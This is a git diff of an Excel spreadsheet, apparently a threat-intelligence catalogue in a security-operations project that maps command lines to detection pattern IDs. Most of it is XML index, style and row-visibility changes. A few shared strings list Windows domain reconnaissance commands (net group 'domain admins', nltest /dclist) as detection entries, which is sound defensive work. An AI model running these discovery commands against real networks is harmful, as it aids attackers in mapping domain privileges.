+        <v>110</v>
       </c>
       <c r="C203" s="1"/>
       <c r="E203" t="s">
         <v>6</v>
       </c>
       <c r="F203" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="204" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="204" spans="1:6" ht="17" hidden="1">
       <c r="A204" t="s">
         <v>24</v>
       </c>
@@ -4959,7 +4986,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="205" spans="1:6" ht="17">
+    <row r="205" spans="1:6" ht="17" hidden="1">
       <c r="A205" t="s">
         <v>24</v>
       </c>
@@ -4976,15 +5003,15 @@
         <v>28</v>
       </c>
     </row>
-    <row r="206" spans="1:6" ht="17">
+    <row r="206" spans="1:6" ht="17" hidden="1">
       <c r="A206" t="s">
         <v>24</v>
       </c>
       <c r="B206" s="1" t="s">
+        <v>51</v>
+      </c>
+      <c r="C206" s="1" t="s">
         <v>52</v>
-      </c>
-      <c r="C206" s="1" t="s">
-        <v>53</v>
       </c>
       <c r="E206" t="s">
         <v>6</v>
@@ -4993,15 +5020,15 @@
         <v>28</v>
       </c>
     </row>
-    <row r="207" spans="1:6" ht="17">
+    <row r="207" spans="1:6" ht="17" hidden="1">
       <c r="A207" t="s">
         <v>24</v>
       </c>
       <c r="B207" s="1" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
       <c r="C207" s="1" t="s">
-        <v>53</v>
+        <v>52</v>
       </c>
       <c r="E207" t="s">
         <v>6</v>
@@ -5010,144 +5037,144 @@
         <v>28</v>
       </c>
     </row>
-    <row r="208" spans="1:6" ht="17">
+    <row r="208" spans="1:6" ht="17" hidden="1">
       <c r="A208" t="s">
         <v>24</v>
       </c>
       <c r="B208" s="1" t="s">
-        <v>77</v>
+        <v>76</v>
       </c>
       <c r="C208" s="1"/>
       <c r="E208" t="s">
         <v>6</v>
       </c>
       <c r="F208" t="s">
-        <v>72</v>
-      </c>
-    </row>
-    <row r="209" spans="1:6" ht="17">
+        <v>71</v>
+      </c>
+    </row>
+    <row r="209" spans="1:6" ht="17" hidden="1">
       <c r="A209" t="s">
         <v>24</v>
       </c>
       <c r="B209" s="1" t="s">
-        <v>135</v>
+        <v>134</v>
       </c>
       <c r="C209" s="1"/>
       <c r="E209" t="s">
         <v>6</v>
       </c>
       <c r="F209" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="210" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="210" spans="1:6" ht="17" hidden="1">
       <c r="A210" t="s">
         <v>24</v>
       </c>
       <c r="B210" s="1" t="s">
-        <v>244</v>
+        <v>243</v>
       </c>
       <c r="C210" s="1"/>
       <c r="E210" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F210" t="s">
-        <v>238</v>
-      </c>
-    </row>
-    <row r="211" spans="1:6" ht="17">
+        <v>237</v>
+      </c>
+    </row>
+    <row r="211" spans="1:6" ht="17" hidden="1">
       <c r="A211" t="s">
         <v>24</v>
       </c>
       <c r="B211" s="1" t="s">
-        <v>245</v>
+        <v>244</v>
       </c>
       <c r="C211" s="1"/>
       <c r="E211" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F211" t="s">
-        <v>238</v>
-      </c>
-    </row>
-    <row r="212" spans="1:6" ht="34">
+        <v>237</v>
+      </c>
+    </row>
+    <row r="212" spans="1:6" ht="34" hidden="1">
       <c r="A212" t="s">
         <v>24</v>
       </c>
       <c r="B212" s="1" t="s">
+        <v>266</v>
+      </c>
+      <c r="C212" s="1" t="s">
         <v>267</v>
       </c>
-      <c r="C212" s="1" t="s">
-        <v>268</v>
-      </c>
       <c r="E212" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F212" t="s">
-        <v>238</v>
-      </c>
-    </row>
-    <row r="213" spans="1:6" ht="17">
+        <v>237</v>
+      </c>
+    </row>
+    <row r="213" spans="1:6" ht="17" hidden="1">
       <c r="A213" t="s">
         <v>24</v>
       </c>
       <c r="B213" s="1" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
       <c r="C213" s="1"/>
       <c r="E213" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F213" t="s">
-        <v>289</v>
-      </c>
-    </row>
-    <row r="214" spans="1:6" ht="17">
+        <v>288</v>
+      </c>
+    </row>
+    <row r="214" spans="1:6" ht="17" hidden="1">
       <c r="A214" t="s">
         <v>24</v>
       </c>
       <c r="B214" s="1" t="s">
-        <v>288</v>
+        <v>287</v>
       </c>
       <c r="C214" s="1"/>
       <c r="E214" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F214" t="s">
-        <v>289</v>
-      </c>
-    </row>
-    <row r="215" spans="1:6" ht="204">
+        <v>288</v>
+      </c>
+    </row>
+    <row r="215" spans="1:6" ht="204" hidden="1">
       <c r="A215" t="s">
         <v>24</v>
       </c>
       <c r="B215" s="1" t="s">
-        <v>295</v>
+        <v>294</v>
       </c>
       <c r="C215" s="1"/>
       <c r="E215" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F215" t="s">
-        <v>294</v>
-      </c>
-    </row>
-    <row r="216" spans="1:6" ht="17">
+        <v>293</v>
+      </c>
+    </row>
+    <row r="216" spans="1:6" ht="17" hidden="1">
       <c r="A216" t="s">
         <v>24</v>
       </c>
       <c r="B216" s="1" t="s">
-        <v>389</v>
+        <v>388</v>
       </c>
       <c r="C216" s="1"/>
       <c r="E216" t="s">
+        <v>384</v>
+      </c>
+      <c r="F216" t="s">
         <v>385</v>
       </c>
-      <c r="F216" t="s">
-        <v>386</v>
-      </c>
-    </row>
-    <row r="217" spans="1:6" ht="17">
+    </row>
+    <row r="217" spans="1:6" ht="17" hidden="1">
       <c r="A217" t="s">
         <v>40</v>
       </c>
@@ -5164,7 +5191,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="218" spans="1:6" ht="17">
+    <row r="218" spans="1:6" ht="17" hidden="1">
       <c r="A218" t="s">
         <v>40</v>
       </c>
@@ -5181,15 +5208,15 @@
         <v>28</v>
       </c>
     </row>
-    <row r="219" spans="1:6" ht="34">
+    <row r="219" spans="1:6" ht="34" hidden="1">
       <c r="A219" t="s">
         <v>40</v>
       </c>
       <c r="B219" s="1" t="s">
+        <v>54</v>
+      </c>
+      <c r="C219" s="1" t="s">
         <v>55</v>
-      </c>
-      <c r="C219" s="1" t="s">
-        <v>56</v>
       </c>
       <c r="E219" t="s">
         <v>6</v>
@@ -5198,124 +5225,124 @@
         <v>28</v>
       </c>
     </row>
-    <row r="220" spans="1:6" ht="17">
+    <row r="220" spans="1:6" ht="17" hidden="1">
       <c r="A220" t="s">
         <v>40</v>
       </c>
       <c r="B220" s="1" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="C220" s="1" t="s">
-        <v>56</v>
+        <v>55</v>
       </c>
       <c r="E220" t="s">
         <v>6</v>
       </c>
       <c r="F220" t="s">
-        <v>72</v>
-      </c>
-    </row>
-    <row r="221" spans="1:6" ht="17">
+        <v>71</v>
+      </c>
+    </row>
+    <row r="221" spans="1:6" ht="17" hidden="1">
       <c r="A221" t="s">
         <v>40</v>
       </c>
       <c r="B221" s="1" t="s">
+        <v>93</v>
+      </c>
+      <c r="C221" s="1" t="s">
         <v>94</v>
       </c>
-      <c r="C221" s="1" t="s">
-        <v>95</v>
-      </c>
       <c r="E221" t="s">
         <v>6</v>
       </c>
       <c r="F221" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="222" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="222" spans="1:6" ht="17" hidden="1">
       <c r="A222" t="s">
         <v>40</v>
       </c>
       <c r="B222" s="1" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="C222" s="1" t="s">
-        <v>124</v>
+        <v>123</v>
       </c>
       <c r="E222" t="s">
         <v>6</v>
       </c>
       <c r="F222" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="223" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="223" spans="1:6" ht="17" hidden="1">
       <c r="A223" t="s">
         <v>40</v>
       </c>
       <c r="B223" s="1" t="s">
-        <v>121</v>
+        <v>120</v>
       </c>
       <c r="C223" s="1" t="s">
-        <v>124</v>
+        <v>123</v>
       </c>
       <c r="E223" t="s">
         <v>6</v>
       </c>
       <c r="F223" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="224" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="224" spans="1:6" ht="17" hidden="1">
       <c r="A224" t="s">
         <v>40</v>
       </c>
       <c r="B224" s="1" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="C224" s="1" t="s">
-        <v>124</v>
+        <v>123</v>
       </c>
       <c r="E224" t="s">
         <v>6</v>
       </c>
       <c r="F224" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="225" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="225" spans="1:6" ht="17" hidden="1">
       <c r="A225" t="s">
         <v>40</v>
       </c>
       <c r="B225" s="1" t="s">
+        <v>122</v>
+      </c>
+      <c r="C225" s="1" t="s">
         <v>123</v>
       </c>
-      <c r="C225" s="1" t="s">
-        <v>124</v>
-      </c>
       <c r="E225" t="s">
         <v>6</v>
       </c>
       <c r="F225" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="226" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="226" spans="1:6" ht="17" hidden="1">
       <c r="A226" t="s">
         <v>40</v>
       </c>
       <c r="B226" s="1" t="s">
-        <v>139</v>
+        <v>138</v>
       </c>
       <c r="C226" s="1"/>
       <c r="E226" t="s">
         <v>6</v>
       </c>
       <c r="F226" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="227" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="227" spans="1:6" ht="17" hidden="1">
       <c r="A227" t="s">
         <v>11</v>
       </c>
@@ -5332,7 +5359,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="228" spans="1:6" ht="17">
+    <row r="228" spans="1:6" ht="17" hidden="1">
       <c r="A228" t="s">
         <v>11</v>
       </c>
@@ -5349,7 +5376,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="229" spans="1:6" ht="17">
+    <row r="229" spans="1:6" ht="17" hidden="1">
       <c r="A229" t="s">
         <v>11</v>
       </c>
@@ -5366,7 +5393,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="230" spans="1:6" ht="17">
+    <row r="230" spans="1:6" ht="17" hidden="1">
       <c r="A230" t="s">
         <v>11</v>
       </c>
@@ -5383,156 +5410,156 @@
         <v>28</v>
       </c>
     </row>
-    <row r="231" spans="1:6" ht="17">
+    <row r="231" spans="1:6" ht="17" hidden="1">
       <c r="A231" t="s">
         <v>11</v>
       </c>
       <c r="B231" s="1" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="C231" s="1"/>
       <c r="E231" t="s">
         <v>6</v>
       </c>
       <c r="F231" t="s">
-        <v>72</v>
-      </c>
-    </row>
-    <row r="232" spans="1:6" ht="17">
+        <v>71</v>
+      </c>
+    </row>
+    <row r="232" spans="1:6" ht="17" hidden="1">
       <c r="A232" t="s">
         <v>11</v>
       </c>
       <c r="B232" s="1" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
       <c r="C232" s="1"/>
       <c r="E232" t="s">
         <v>6</v>
       </c>
       <c r="F232" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="233" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="233" spans="1:6" ht="17" hidden="1">
       <c r="A233" t="s">
         <v>11</v>
       </c>
       <c r="B233" s="1" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="C233" s="1"/>
       <c r="E233" t="s">
-        <v>312</v>
+        <v>311</v>
       </c>
       <c r="F233" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="234" spans="1:6" ht="34">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="234" spans="1:6" ht="34" hidden="1">
       <c r="A234" t="s">
         <v>11</v>
       </c>
       <c r="B234" s="1" t="s">
-        <v>340</v>
+        <v>339</v>
       </c>
       <c r="C234" s="1"/>
       <c r="E234" t="s">
-        <v>312</v>
+        <v>311</v>
       </c>
       <c r="F234" t="s">
-        <v>332</v>
-      </c>
-    </row>
-    <row r="235" spans="1:6" ht="17">
+        <v>331</v>
+      </c>
+    </row>
+    <row r="235" spans="1:6" ht="17" hidden="1">
       <c r="A235" t="s">
         <v>11</v>
       </c>
       <c r="B235" s="1" t="s">
-        <v>341</v>
+        <v>340</v>
       </c>
       <c r="C235" s="1"/>
       <c r="E235" t="s">
-        <v>312</v>
+        <v>311</v>
       </c>
       <c r="F235" t="s">
-        <v>342</v>
-      </c>
-    </row>
-    <row r="236" spans="1:6" ht="17">
+        <v>341</v>
+      </c>
+    </row>
+    <row r="236" spans="1:6" ht="17" hidden="1">
       <c r="A236" t="s">
         <v>11</v>
       </c>
       <c r="B236" s="1" t="s">
-        <v>344</v>
+        <v>343</v>
       </c>
       <c r="C236" s="1"/>
       <c r="E236" t="s">
-        <v>312</v>
+        <v>311</v>
       </c>
       <c r="F236" t="s">
-        <v>342</v>
-      </c>
-    </row>
-    <row r="237" spans="1:6" ht="17">
+        <v>341</v>
+      </c>
+    </row>
+    <row r="237" spans="1:6" ht="17" hidden="1">
       <c r="A237" t="s">
         <v>11</v>
       </c>
       <c r="B237" s="1" t="s">
-        <v>346</v>
+        <v>345</v>
       </c>
       <c r="C237" s="1"/>
       <c r="E237" t="s">
-        <v>312</v>
+        <v>311</v>
       </c>
       <c r="F237" t="s">
-        <v>342</v>
-      </c>
-    </row>
-    <row r="238" spans="1:6" ht="34">
+        <v>341</v>
+      </c>
+    </row>
+    <row r="238" spans="1:6" ht="34" hidden="1">
       <c r="A238" t="s">
         <v>11</v>
       </c>
       <c r="B238" s="1" t="s">
-        <v>356</v>
+        <v>355</v>
       </c>
       <c r="C238" s="1"/>
       <c r="E238" t="s">
-        <v>312</v>
+        <v>311</v>
       </c>
       <c r="F238" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="239" spans="1:6" ht="17">
+        <v>349</v>
+      </c>
+    </row>
+    <row r="239" spans="1:6" ht="17" hidden="1">
       <c r="A239" t="s">
         <v>11</v>
       </c>
       <c r="B239" s="1" t="s">
-        <v>388</v>
+        <v>387</v>
       </c>
       <c r="C239" s="1"/>
       <c r="E239" t="s">
+        <v>384</v>
+      </c>
+      <c r="F239" t="s">
         <v>385</v>
       </c>
-      <c r="F239" t="s">
-        <v>386</v>
-      </c>
-    </row>
-    <row r="240" spans="1:6" ht="51">
+    </row>
+    <row r="240" spans="1:6" ht="51" hidden="1">
       <c r="A240" t="s">
+        <v>279</v>
+      </c>
+      <c r="B240" s="1" t="s">
+        <v>278</v>
+      </c>
+      <c r="C240" s="1" t="s">
         <v>280</v>
       </c>
-      <c r="B240" s="1" t="s">
-        <v>279</v>
-      </c>
-      <c r="C240" s="1" t="s">
-        <v>281</v>
-      </c>
       <c r="E240" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F240" t="s">
-        <v>277</v>
+        <v>276</v>
       </c>
     </row>
   </sheetData>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{06BBEF3F-D90D-8B4C-AB16-09A8527744FD}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{37152B8E-8450-1341-8DB2-46DFA58928B4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="940" windowWidth="34560" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="402">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="410">
   <si>
     <t>Pattern</t>
   </si>
@@ -1312,10 +1312,6 @@
     <t>NET_P2005</t>
   </si>
   <si>
-    <t>NET_P1001
-NET_P2002</t>
-  </si>
-  <si>
     <t>NET_P2004</t>
   </si>
   <si>
@@ -1327,11 +1323,6 @@
   </si>
   <si>
     <t>NET_P1004</t>
-  </si>
-  <si>
-    <t>NET_P1001
-NET_P1002
-NET_P1004</t>
   </si>
   <si>
     <t>NET_P1001
@@ -1343,6 +1334,45 @@
   </si>
   <si>
     <t>NET_3001</t>
+  </si>
+  <si>
+    <t>NET_P2004
+NET_P3003</t>
+  </si>
+  <si>
+    <t>NET_P3003</t>
+  </si>
+  <si>
+    <t>NET_P3004</t>
+  </si>
+  <si>
+    <t>NET_4001</t>
+  </si>
+  <si>
+    <t>NET_4002</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P2002
+NET_P4000
+NET_P4004</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P1002
+NET_P1004
+NET_P4000
+NET_P4002</t>
+  </si>
+  <si>
+    <t>NET_P0001
+NET_P3003</t>
+  </si>
+  <si>
+    <t>NET_5001</t>
+  </si>
+  <si>
+    <t>NET_5000</t>
   </si>
 </sst>
 </file>
@@ -1742,8 +1772,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F240"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="B66" sqref="B66"/>
+    <sheetView tabSelected="1" topLeftCell="A57" workbookViewId="0">
+      <selection activeCell="A75" sqref="A75"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -2646,7 +2676,7 @@
     </row>
     <row r="57" spans="1:6" ht="136">
       <c r="A57" t="s">
-        <v>400</v>
+        <v>409</v>
       </c>
       <c r="B57" s="1" t="s">
         <v>328</v>
@@ -2659,9 +2689,9 @@
         <v>324</v>
       </c>
     </row>
-    <row r="58" spans="1:6" ht="17">
-      <c r="A58" t="s">
-        <v>400</v>
+    <row r="58" spans="1:6" ht="34">
+      <c r="A58" s="1" t="s">
+        <v>407</v>
       </c>
       <c r="B58" s="1" t="s">
         <v>145</v>
@@ -2676,9 +2706,9 @@
         <v>152</v>
       </c>
     </row>
-    <row r="59" spans="1:6" ht="17">
-      <c r="A59" t="s">
-        <v>400</v>
+    <row r="59" spans="1:6" ht="34">
+      <c r="A59" s="1" t="s">
+        <v>407</v>
       </c>
       <c r="B59" s="1" t="s">
         <v>144</v>
@@ -2695,7 +2725,7 @@
     </row>
     <row r="60" spans="1:6" ht="34">
       <c r="A60" t="s">
-        <v>400</v>
+        <v>408</v>
       </c>
       <c r="B60" s="1" t="s">
         <v>382</v>
@@ -2710,7 +2740,7 @@
     </row>
     <row r="61" spans="1:6" ht="17">
       <c r="A61" t="s">
-        <v>400</v>
+        <v>398</v>
       </c>
       <c r="B61" s="1" t="s">
         <v>44</v>
@@ -2727,7 +2757,7 @@
     </row>
     <row r="62" spans="1:6" ht="17">
       <c r="A62" t="s">
-        <v>400</v>
+        <v>402</v>
       </c>
       <c r="B62" s="1" t="s">
         <v>190</v>
@@ -2742,7 +2772,7 @@
     </row>
     <row r="63" spans="1:6" ht="17">
       <c r="A63" t="s">
-        <v>401</v>
+        <v>399</v>
       </c>
       <c r="B63" s="1" t="s">
         <v>168</v>
@@ -2759,7 +2789,7 @@
     </row>
     <row r="64" spans="1:6" ht="17">
       <c r="A64" t="s">
-        <v>400</v>
+        <v>401</v>
       </c>
       <c r="B64" s="1" t="s">
         <v>230</v>
@@ -2774,7 +2804,7 @@
     </row>
     <row r="65" spans="1:6" ht="17">
       <c r="A65" t="s">
-        <v>400</v>
+        <v>401</v>
       </c>
       <c r="B65" s="1" t="s">
         <v>229</v>
@@ -2789,7 +2819,7 @@
     </row>
     <row r="66" spans="1:6" ht="17">
       <c r="A66" t="s">
-        <v>400</v>
+        <v>404</v>
       </c>
       <c r="B66" s="1" t="s">
         <v>364</v>
@@ -2804,7 +2834,7 @@
     </row>
     <row r="67" spans="1:6" ht="17">
       <c r="A67" t="s">
-        <v>400</v>
+        <v>403</v>
       </c>
       <c r="B67" s="1" t="s">
         <v>260</v>
@@ -2821,7 +2851,7 @@
     </row>
     <row r="68" spans="1:6" ht="17">
       <c r="A68" t="s">
-        <v>400</v>
+        <v>403</v>
       </c>
       <c r="B68" s="1" t="s">
         <v>260</v>
@@ -2921,7 +2951,7 @@
     </row>
     <row r="74" spans="1:6" ht="34">
       <c r="A74" s="1" t="s">
-        <v>396</v>
+        <v>395</v>
       </c>
       <c r="B74" s="1" t="s">
         <v>369</v>
@@ -2936,7 +2966,7 @@
     </row>
     <row r="75" spans="1:6" ht="102">
       <c r="A75" s="1" t="s">
-        <v>398</v>
+        <v>406</v>
       </c>
       <c r="B75" s="1" t="s">
         <v>305</v>
@@ -2951,7 +2981,7 @@
     </row>
     <row r="76" spans="1:6" ht="51">
       <c r="A76" s="1" t="s">
-        <v>399</v>
+        <v>397</v>
       </c>
       <c r="B76" s="1" t="s">
         <v>336</v>
@@ -2966,7 +2996,7 @@
     </row>
     <row r="77" spans="1:6" ht="68">
       <c r="A77" s="1" t="s">
-        <v>393</v>
+        <v>405</v>
       </c>
       <c r="B77" s="1" t="s">
         <v>325</v>
@@ -2998,7 +3028,7 @@
     </row>
     <row r="79" spans="1:6" ht="17">
       <c r="A79" t="s">
-        <v>397</v>
+        <v>396</v>
       </c>
       <c r="B79" s="1" t="s">
         <v>166</v>
@@ -3015,7 +3045,7 @@
     </row>
     <row r="80" spans="1:6" ht="17">
       <c r="A80" t="s">
-        <v>394</v>
+        <v>393</v>
       </c>
       <c r="B80" s="1" t="s">
         <v>231</v>
@@ -3030,7 +3060,7 @@
     </row>
     <row r="81" spans="1:6" ht="68">
       <c r="A81" s="1" t="s">
-        <v>394</v>
+        <v>400</v>
       </c>
       <c r="B81" s="1" t="s">
         <v>350</v>
@@ -3062,7 +3092,7 @@
     </row>
     <row r="83" spans="1:6" ht="17">
       <c r="A83" t="s">
-        <v>395</v>
+        <v>394</v>
       </c>
       <c r="B83" s="1" t="s">
         <v>172</v>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{37152B8E-8450-1341-8DB2-46DFA58928B4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F02FC3D6-43D6-A346-9B6A-30417EA9F00F}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="410">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="412">
   <si>
     <t>Pattern</t>
   </si>
@@ -225,9 +225,6 @@
   </si>
   <si>
     <t>net group "domain admins" /domain</t>
-  </si>
-  <si>
-    <t>NLTEST</t>
   </si>
   <si>
     <t>nltest.exe /dclist:#{target_domain}</t>
@@ -1330,9 +1327,6 @@
 NET_P3001</t>
   </si>
   <si>
-    <t>NET_</t>
-  </si>
-  <si>
     <t>NET_3001</t>
   </si>
   <si>
@@ -1374,12 +1368,25 @@
   <si>
     <t>NET_5000</t>
   </si>
+  <si>
+    <t>NET_XXXX</t>
+  </si>
+  <si>
+    <t>NLTEST_P1001</t>
+  </si>
+  <si>
+    <t>NLTEST_P1001
+NLTEST_P1000</t>
+  </si>
+  <si>
+    <t>NLTEST_P1000</t>
+  </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="3">
+  <fonts count="4">
     <font>
       <sz val="12"/>
       <color theme="1"/>
@@ -1398,16 +1405,29 @@
       <color rgb="FF000000"/>
       <name val="Inter"/>
     </font>
+    <font>
+      <sz val="12"/>
+      <color rgb="FF000000"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
   </fonts>
-  <fills count="2">
+  <fills count="3">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
     </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFD9D9D9"/>
+        <bgColor rgb="FFD9D9D9"/>
+      </patternFill>
+    </fill>
   </fills>
-  <borders count="1">
+  <borders count="2">
     <border>
       <left/>
       <right/>
@@ -1415,16 +1435,35 @@
       <bottom/>
       <diagonal/>
     </border>
+    <border>
+      <left style="thin">
+        <color rgb="FF000000"/>
+      </left>
+      <right style="thin">
+        <color rgb="FF000000"/>
+      </right>
+      <top style="thin">
+        <color rgb="FF000000"/>
+      </top>
+      <bottom style="thin">
+        <color rgb="FF000000"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="3">
+  <cellXfs count="7">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1451,14 +1490,8 @@
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
 <table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}" name="Table1" displayName="Table1" ref="A1:F240" totalsRowShown="0">
-  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}">
-    <filterColumn colId="0">
-      <customFilters>
-        <customFilter val="*NET_*"/>
-      </customFilters>
-    </filterColumn>
-  </autoFilter>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A57:F101">
+  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}"/>
